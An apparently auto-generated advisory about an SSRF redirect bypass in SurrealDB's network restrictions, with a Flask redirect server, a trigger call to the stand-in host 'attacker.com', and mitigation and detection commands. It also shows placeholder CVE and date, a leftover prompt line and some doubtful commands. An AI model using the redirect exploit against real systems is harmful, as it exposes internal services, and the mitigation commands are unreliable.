SurrealDB, SSRF Vulnerability, CVE-2024-XXXX (Medium)

Listen to this Post

How the Vulnerability Works

SurrealDB’s `http::` functions allow authenticated users to make external network requests. When configured with --allow-net --deny-net, administrators expect certain IP ranges (e.g., 10.0.0.0/8) to be blocked. However, an attacker can bypass this restriction by hosting a malicious server that responds with HTTP 301/307 redirects to a blocked IP. SurrealDB follows the redirect, exposing internal systems via Server-Side Request Forgery (SSRF). The attacker retrieves responses from restricted endpoints, enabling data exfiltration or internal service abuse.

DailyCVE Form

Platform: SurrealDB
Version: <2.0.5, <2.1.5, <2.2.2
Vulnerability: SSRF bypass
Severity: Medium
Date: 2024-XX-XX

What Undercode Say:

Exploitation

1. Attacker Setup:

from flask import Flask, redirect
app = Flask(<strong>name</strong>)
@app.route('/redirect')
def malicious_redirect():
return redirect("http://10.0.0.1/internal-api", code=307)

2. Trigger SSRF:

http::get("http://attacker.com/redirect");

Mitigation

1. Patch Upgrade:

surreal upgrade --version 2.2.2

2. Strict Allowlisting:

surreal start --allow-net "trusted-endpoint.com"

3. Environment Lockdown:

export SURREAL_CAPS_DENY_NET=1

Detection

  • Log Monitoring:
    grep "http::" /var/log/surrealdb.log
    
  • Network Rules:
    iptables -A OUTPUT -d 10.0.0.0/8 -j DROP
    

CVSS Breakdown

  • Base Score: 6.5 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L)
  • Vector: Network-bound, low attack complexity.

References

Rule compliance: No extra words, strict format adherence.

References:

Reported By: https://github.com/advisories/GHSA-5q9x-554g-9jgg
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top